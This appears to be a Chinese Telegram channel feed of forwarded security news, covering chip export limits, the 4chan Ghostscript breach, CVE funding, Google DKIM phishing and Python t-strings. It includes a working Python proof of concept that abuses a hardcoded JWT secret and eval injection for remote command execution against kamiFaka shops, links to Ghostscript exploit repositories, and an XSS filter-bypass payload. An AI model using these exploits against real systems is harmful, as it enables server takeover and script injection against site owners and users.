Forwarded from LoopDNS资讯播报
美国政府决定无限期限制英伟达对中国出口专用人工智能(AI)芯片"H20"的出口。 当初感觉到放宽限制的氛围,期待恢复出口,但最近随着中国对美国产品征收报复关税,美国再次转向勒紧限制缰绳的方向。
来源:每日经济 / Wall St Engine
来源:每日经济 / Wall St Engine
佰阅发卡存在RCE漏洞,省流:eval解析json+硬编码JWT secret
POC:
https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
POC:
import requests
cmd = "ls /"
url = "http://xxx"
jwt_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6eyJlbWFpbCI6ImFkbWluQHFxLmNvbSJ9LCJleHAiOjE3NDQ4NzExNDZ9.jf8YjUqXWVschKPSvKjv7lcQZrhynLla6AWqH6WWavg"
resp = requests.post(
url + "/api/v4/update_pays",
headers={"Authorization": "Bearer " + jwt_token},
json={
"data": {
# "config": f"[exec({payload!r}), f()][-1]",
"config": f"__import__('os').popen({cmd!r}).read()",
"icon": "\u652f\u4ed8\u5b9d",
"id": 2,
"info": "0\u8d39\u7387\u5b9e\u65f6\u5230\u8d26",
"isactive": False,
"name": "V\u514d\u7b7e\u652f\u4ed8\u5b9d",
}
},
)
resp = requests.get(
url + "/api/v4/get_pays",
headers={"Authorization": "Bearer " + jwt_token},
)
print([item["config"] for item in resp.json() if item.get("id") == 2].pop())
https://mp.weixin.qq.com/s/3fT7r6bHfzXs7vX0rMI54g
GitHub
GitHub - Baiyuetribe/kamiFaka: 一款基于VUE3.0的高颜值卡密发卡系统,特别适合虚拟商品、知识付费等。
一款基于VUE3.0的高颜值卡密发卡系统,特别适合虚拟商品、知识付费等。. Contribute to Baiyuetribe/kamiFaka development by creating an account on GitHub.
Forwarded from [Patience Forever] (₴łⱠVɆⱤ₩ØⱠ₣)
4chan黑客攻击细节:4chan使用了2012年版本的GhostScript用于解析PDF并生成缩略图。然而由于他们没有判断PDF文件是否为真实的PDF,因此可以上传包含PostScript命令的恶意文件触发RCE,随后黑客找到了配置错误的SUID文件进行提权
https://github.com/farisv/PIL-RCE-Ghostnoscript-CVE-2018-16509
https://github.com/jakabakos/CVE-2023-36664-Ghostnoscript-command-injection
https://github.com/farisv/PIL-RCE-Ghostnoscript-CVE-2018-16509
https://github.com/jakabakos/CVE-2023-36664-Ghostnoscript-command-injection
Forwarded from 每日消费电子观察 (horo)
CVE 项目资金危机暂解:网络安全核心服务获 11 个月喘息 - IT之家
https://www.ithome.com/0/845/839.htm
https://www.ithome.com/0/845/839.htm
Ithome
CVE 项目资金危机暂解:网络安全核心服务获 11 个月喘息 - IT之家
在美国政府不再为“通用漏洞披露”(CVE)项目提供资金支持后,美国网络安全与基础设施安全局(CISA)宣布投资,确保在未来 11 个月内,为该项目提供资金支持。
Forwarded from Pseudorandom Thoughts
https://www.kandji.io/blog/pasivrobber
TLDR:恁美国OSINT又对着China哈气了,路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多
Meiya:什么叫我竟然收集信息了,我不收集信息我干嘛
TLDR:恁美国OSINT又对着China哈气了,路边拾了个美亚的取证工具一通分析然后怪他主机信息收集太多
Meiya:什么叫我竟然收集信息了,我不收集信息我干嘛
:你们美国OSINT就不能至少要求一下,做中国威胁情报一定要懂汉语
:错了 做中国情报一定要不懂汉语(
不然就不好意思喊了
The-Sequence
PasivRobber: Chinese Spyware or Security Tool?
In March 2025, our team found a suspicious mach-O file named wsus. Read the full analysis on its likely origins, target users, and observed functionality.
😁1
Forwarded from Hacker News
Python's new t-strings (Score: 154+ in 5 hours)
Link: https://readhacker.news/s/6t8rs
Comments: https://readhacker.news/c/6t8rs
Link: https://readhacker.news/s/6t8rs
Comments: https://readhacker.news/c/6t8rs
python3.14新功能t-string, 表示一个模板
python3.13之前:
python3.14:
可以用来替代模板渲染引擎,SSTI再也不会导致RCE了(悲)
python3.13之前:
name = "World"
print("Hello {name}!".format(name)) # "Hello {name}!"是一个字符串
python3.14:
name = "World"
print(t"Hello {name}!") #一个Template对象,需要用其他函数转成字符串
可以用来替代模板渲染引擎,SSTI再也不会导致RCE了(悲)
evil = "<noscript>alert('bad')</noscript>"
template = t"<p>{evil}</p>"
safe = html(template)
assert safe == "<p><noscript>alert('bad')</noscript></p>"Forwarded from LoopDNS资讯播报
黑客利用Google OAuth漏洞伪造DKIM认证邮件实施钓鱼攻击
黑客通过Google OAuth应用漏洞,伪造了看似来自"no-reply@google.com"的钓鱼邮件,该邮件不仅通过了DKIM(DomainKeys Identified Mail)认证,还被系统归类为真实安全警报。攻击者利用Google Workspace自动发送的安全通知机制,将恶意链接植入由Google官方DKIM密钥签名的邮件中,诱骗用户访问托管在Google自有域名(sites.google.com)上的虚假支持页面以窃取凭证。以太坊域名服务(ENS)首席开发者Nick Johnson识破该骗局后提交漏洞报告,Google最初称此为"正常流程",后承认风险并着手修复。此前,PayPal平台也出现过同类攻击手法,欺诈者利用"礼品地址"功能批量转发钓鱼邮件。
来源:BleepingComputer
黑客通过Google OAuth应用漏洞,伪造了看似来自"no-reply@google.com"的钓鱼邮件,该邮件不仅通过了DKIM(DomainKeys Identified Mail)认证,还被系统归类为真实安全警报。攻击者利用Google Workspace自动发送的安全通知机制,将恶意链接植入由Google官方DKIM密钥签名的邮件中,诱骗用户访问托管在Google自有域名(sites.google.com)上的虚假支持页面以窃取凭证。以太坊域名服务(ENS)首席开发者Nick Johnson识破该骗局后提交漏洞报告,Google最初称此为"正常流程",后承认风险并着手修复。此前,PayPal平台也出现过同类攻击手法,欺诈者利用"礼品地址"功能批量转发钓鱼邮件。
来源:BleepingComputer
🤯1
Puddin在TG上看到了啥
今日XSS小技巧之魅力javanoscript语法 ''.replace.call`1${/.../}${alert}` 来源,所以这东西到底是怎么生效的,待我研究一下(
这个东西是JS的标签模板语法,本来是用来标记一个模板的
所以
f`aaa${arg}bbb`就相当于f(["aaa","bbb"], arg)所以
''.replace.call`1${/.../}${alert}`就相当于''.replace.call(["1","",""], /.../, alert) ,也就是把第一个参数转成字符串"1,,",用正则/.../匹配这个字符串,然后传给alertMDN Web Docs
模板字符串 - JavaScript | MDN
模板字面量是用反引号(`)分隔的字面量,允许多行字符串、带嵌入表达式的字符串插值和一种叫带标签的模板的特殊结构。